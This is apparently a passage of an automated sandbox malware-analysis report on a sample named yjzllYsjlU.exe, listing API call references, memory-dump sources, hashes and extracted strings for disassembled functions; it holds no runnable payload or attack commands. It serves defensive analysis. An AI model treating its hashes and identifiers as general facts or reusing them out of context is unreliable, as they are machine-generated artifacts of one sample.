                    • Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                    • Instruction Fuzzy Hash: C4415379A40619EFCF09DF64C868A6DB7B6FF88310F048169E51697790CB74AD01CF81
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0041ECED
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041ED17
                      • Part of subcall function 0041F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F3FA
                    • __alloca_probe_16.LIBCMT ref: 0041ED53
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041ED94
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EDC6
                    • __freea.LIBCMT ref: 0041EDEC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 1319684358-0
                    • Opcode ID: 905480babbdb8262410189c15cedbadfc3d9fa68bc29489cc7bbb29755aa4237
                    • Instruction ID: e5ba4aa972b5b687e82aeba40850cce8f465bb6681a4cf65264b7c2e3798f256
                    • Opcode Fuzzy Hash: 905480babbdb8262410189c15cedbadfc3d9fa68bc29489cc7bbb29755aa4237
                    • Instruction Fuzzy Hash: 3C31A3B5E001068BCB14DFAAD5415EEB7B4EF49314F64406FE805E7351DB389D82C799
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A069
                      • Part of subcall function 0042B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B5AF
                    • GetCurrentThread.KERNEL32 ref: 0042A073
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A07F
                      • Part of subcall function 00420388: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 0042039A
                      • Part of subcall function 00420814: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042081B
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A0C2
                      • Part of subcall function 0042B512: SetEvent.KERNEL32(?,?,0042A0C7,0042AE5B,00000000,?,00000000,0042AE5B,00000004,0042B507,?,00000000,?,?,00000000), ref: 0042B556
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A0CB
                      • Part of subcall function 0042AB41: List.LIBCONCRT ref: 0042AB77
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A0DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 318399070-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: 786c6bbc9f4db79065070eee32726b74de41850732c6b9a0a53a64165b4dd308
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 5721E031600B249FCB24EF66E9908ABF3F5FF48304740455EE942A7651CB38F805CB9A
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 021AA2D0
                      • Part of subcall function 021AB7C7: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 021AB816
                    • GetCurrentThread.KERNEL32 ref: 021AA2DA
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 021AA2E6
                      • Part of subcall function 021A05EF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 021A0601
                      • Part of subcall function 021A0A7B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 021A0A82
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 021AA329
                      • Part of subcall function 021AB779: SetEvent.KERNEL32(?,?,021AA32E,021AB0C2,00000000,?,00000000,021AB0C2,00000004,021AB76E,?,00000000,?,?,00000000), ref: 021AB7BD
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 021AA332
                      • Part of subcall function 021AADA8: __EH_prolog3.LIBCMT ref: 021AADAF
                      • Part of subcall function 021AADA8: List.LIBCONCRT ref: 021AADDE
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 021AA342
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 2908504212-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: 07ac230ffcd66ed8d0dfa4680dc80d4af59829305a58ef8541bfb44722be791a
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: DB21A939500B109FCB24EFA5D9A09ABB3FAFF487007004A1ED843A7660CB74F905CBA5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID: vC
                    • API String ID: 3213747228-1921080006
                    • Opcode ID: 59c984e0335d750eb7e229aa4273084cd5aafbd0618d532e588fc2a2f53891da
                    • Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
                    • Opcode Fuzzy Hash: 59c984e0335d750eb7e229aa4273084cd5aafbd0618d532e588fc2a2f53891da
                    • Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68
                    APIs
                    • GetLastError.KERNEL32(?,?,00434F2E,00433AF2,0041B555,900B88F7,?,00000000,0044B3E8,000000FF,?,0040242A,?,?), ref: 00434F45
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00434F53
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00434F6C
                    • SetLastError.KERNEL32(00000000,?,00434F2E,00433AF2,0041B555,900B88F7,?,00000000,0044B3E8,000000FF,?,0040242A,?,?), ref: 00434FBE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
                    • Instruction ID: 15ffdb8e0af02f49516ecf1b0bf4576f7fedfc7d9ef3b4932012a3e501010d40
                    • Opcode Fuzzy Hash: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
                    • Instruction Fuzzy Hash: 0701283250C7227DAA2027757C4599BAA86EB4A3B8F24223FF724402E1EF9D5C01968D
                    APIs
                    • GetLastError.KERNEL32(?,?,021B5195,021B3D59,0219B7BC,00462014,?,00000000,0044B3E8,000000FF,?,02182691,?,?), ref: 021B51AC
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 021B51BA
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 021B51D3
                    • SetLastError.KERNEL32(00000000,?,021B5195,021B3D59,0219B7BC,00462014,?,00000000,0044B3E8,000000FF,?,02182691,?,?), ref: 021B5225
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
                    • Instruction ID: 1161d8b430b77799b02030cc8f97949d05cabbf1ca22c55074f91a390ff1ded2
                    • Opcode Fuzzy Hash: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
                    • Instruction Fuzzy Hash: 4201283698A721BDA61727757C84BDB26BBEF047747200239F238450F0FF924801C544
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC29
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC2F
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC5C
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC66
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC78
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
                    • Instruction ID: 03917569e0bc54ee2298924e5aad4e28c925d034798c30f2cdbb860cd2e6707d
                    • Opcode Fuzzy Hash: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
                    • Instruction Fuzzy Hash: 9F01DD3564020567D700AB66EC49BEB7768BF41712B54043BFC01D1152EB2CE549979D
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0219FE90
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0219FE96
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0219FEC3
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0219FECD
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0219FEDF
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0219FEF5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
                    • Instruction ID: caee7707cabe6057cafa87929d76d77ef62071420fa6bf070eb726fd4ad893e1
                    • Opcode Fuzzy Hash: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
                    • Instruction Fuzzy Hash: 8901F73A580205BBDF10AB79EC08FAF377CEF41712B750425F419E2892EB38E5058B64
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021C29C3
                    • _free.LIBCMT ref: 021C29B1
                      • Part of subcall function 021BB05C: HeapFree.KERNEL32(00000000,00000000,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?), ref: 021BB072
                      • Part of subcall function 021BB05C: GetLastError.KERNEL32(?,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?,?), ref: 021BB084
                    • _free.LIBCMT ref: 021C2B7D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 2155170405-1765908331
                    • Opcode ID: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
                    • Instruction ID: 61d305c636aa6fdc168c97d249b6c8edb5e0092132cf931332f5c568cd8f7e08
                    • Opcode Fuzzy Hash: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
                    • Instruction Fuzzy Hash: CB51D679940215AFDB24EFA8CC809AE77BDAF54354B3502AEDC20E72A0E770DA41CF55
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: mtx_do_lock
                    • String ID: list too long
                    • API String ID: 1389037287-1124181908
                    • Opcode ID: e8db10ea1e9f31c1c4c8cd784e01dfd0d2ddfc129ac8cf217fbe486e9ba11e96
                    • Instruction ID: 0007737cba0ef289931fff910482b9d26868eafb82600a80664d17b7d07a3ec6
                    • Opcode Fuzzy Hash: e8db10ea1e9f31c1c4c8cd784e01dfd0d2ddfc129ac8cf217fbe486e9ba11e96
                    • Instruction Fuzzy Hash: F951CA71D04718ABDB10DF65CC8AB9AB3B8EF14714F1041ABF80DA7281E778A985CF59
                    APIs
                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434E6D
                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434E86
                    • PMDtoOffset.LIBCMT ref: 00434EAC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FindInstanceTargetType$Offset
                    • String ID: Bad dynamic_cast!
                    • API String ID: 1467055271-2956939130
                    • Opcode ID: 76ec6d7001f37febc2ab6482f7c516d661d45f5fc475c9f7c43be269abc4c233
                    • Instruction ID: 954d36f46f260efd2cd9394cd3d8c23cf35357d38ada446349ce258e6175ccbf
                    • Opcode Fuzzy Hash: 76ec6d7001f37febc2ab6482f7c516d661d45f5fc475c9f7c43be269abc4c233
                    • Instruction Fuzzy Hash: 32210772600205ABCB14DFA4D906AEF77A4FBCC724F10511FF91093680D73DF9008699
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431885
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318A4
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004318EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 1284976207-2046700901
                    • Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
                    • Instruction ID: d01a77f2ab9abe46547ca181dc4035302de0eae64105b64324a031690df06c10
                    • Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
                    • Instruction Fuzzy Hash: 3421EA35B006159BCB19B765D895ABD73A5BF98338F04112BE411872E1CB6CAC428A9D
                    Strings
                    • C:\Users\user\Desktop\yjzllYsjlU.exe, xrefs: 021BE24F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\Desktop\yjzllYsjlU.exe
                    • API String ID: 0-215670176
                    • Opcode ID: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
                    • Instruction ID: 35d13a804390d467fdad2f8ff2684419f19582431d6765ba6e8987c23ae03c69
                    • Opcode Fuzzy Hash: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
                    • Instruction Fuzzy Hash: EE21C571684209AFDB22AF619C84EEB7BBEEF443657404565F939C6190DB30DC51CBA0
                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 021A9F03
                    • std::bad_exception::bad_exception.LIBCMT ref: 021A9F65
                    • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 021A9FA7
                    • std::bad_exception::bad_exception.LIBCMT ref: 021A9FD1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
                    • String ID: 8[F
                    • API String ID: 3836581985-331943168
                    • Opcode ID: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
                    • Instruction ID: 5fd998ebcc251c9dbe77d0399e0b42c3a725477f6a558f62ad85dc9ee9e0064e
                    • Opcode Fuzzy Hash: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
                    • Instruction Fuzzy Hash: D42125799802049FCF05EF64D995A9DBBB5FF05310F11402AF001AB290DB306D86CF55
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
                    • Instruction ID: 2fe954d65b4b50834951edb994104e0446c73801206968c056bf44c713a15be5
                    • Opcode Fuzzy Hash: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
                    • Instruction Fuzzy Hash: 8D01086760861635663520199E0276713888BCABB8F25202FFDA4F73C1EF8CDD42A1EC
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00424F01
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00424F24
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00424F66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 18808576-3650809737
                    • Opcode ID: 0f050f97b8179aa4ac2a16646d21eb55e2bc560f4bbb76bd7718e5c12f5aa014
                    • Instruction ID: 0fe100e528eb00baa15785fa13c2d5db46de6353967fcf2c4de188508199a33a
                    • Opcode Fuzzy Hash: 0f050f97b8179aa4ac2a16646d21eb55e2bc560f4bbb76bd7718e5c12f5aa014
                    • Instruction Fuzzy Hash: 43210034B00224EFCB04EF99D881EAD73A0FF88315F40406FE40697692CB74AE01CB58
                    APIs
                    • GetLastError.KERNEL32(?,?,?,0043694A,?,?,?,?,00437661,?), ref: 0043A676
                    • _free.LIBCMT ref: 0043A6D3
                    • _free.LIBCMT ref: 0043A709
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0043694A,?,?,?,?,00437661,?), ref: 0043A714
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
                    • Instruction ID: 8cce909c9ac14f6c448446a217854be9d18c12721b99b88a770a56678c5f8ba9
                    • Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
                    • Instruction Fuzzy Hash: 2511AB312447007A961166766C86A2B215AD7D937DF24213FF3A4462D2EEAD8C32515F
                    APIs
                    • GetLastError.KERNEL32(?,?,?,021B6BB1,?,?,?,?,021B78C8,?), ref: 021BA8DD
                    • _free.LIBCMT ref: 021BA93A
                    • _free.LIBCMT ref: 021BA970
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,021B6BB1,?,?,?,?,021B78C8,?), ref: 021BA97B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
                    • Instruction ID: 87d9c3f26a76310e2ef3cd6506646ac1e522bb559b2821ba58a588394fd322d6
                    • Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
                    • Instruction Fuzzy Hash: FF1120322C86007ED6372A755C80EFA117BAFC57B8B260134F624524E0EFA28C055555
                    APIs
                    • GetLastError.KERNEL32(?,?,?,004375FB,00402247), ref: 0043A7CD
                    • _free.LIBCMT ref: 0043A82A
                    • _free.LIBCMT ref: 0043A860
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004375FB,00402247), ref: 0043A86B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
                    • Instruction ID: 43a0ef826740dec3b5b6cec3c960c44763b9b2bf66f2e005ed7dcd0d28945869
                    • Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
                    • Instruction Fuzzy Hash: 0A1106312847003A961132765CC5E6B221AEBC977DF24223BF764822D2EFAECC23415F
                    APIs
                    • GetLastError.KERNEL32(?,?,?,021B7862,021824AE), ref: 021BAA34
                    • _free.LIBCMT ref: 021BAA91
                    • _free.LIBCMT ref: 021BAAC7
                    • SetLastError.KERNEL32(00000000,00462170,000000FF,?,021B7862,021824AE), ref: 021BAAD2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
                    • Instruction ID: 2ce481aed3740b092f867dbd1c19376989278106d76045299edcdc9ababa2a65
                    • Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
                    • Instruction Fuzzy Hash: 7011E9352C87007EDA1766755D80EFA227AAFC3778B150235F624925E0EBA28D054665
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
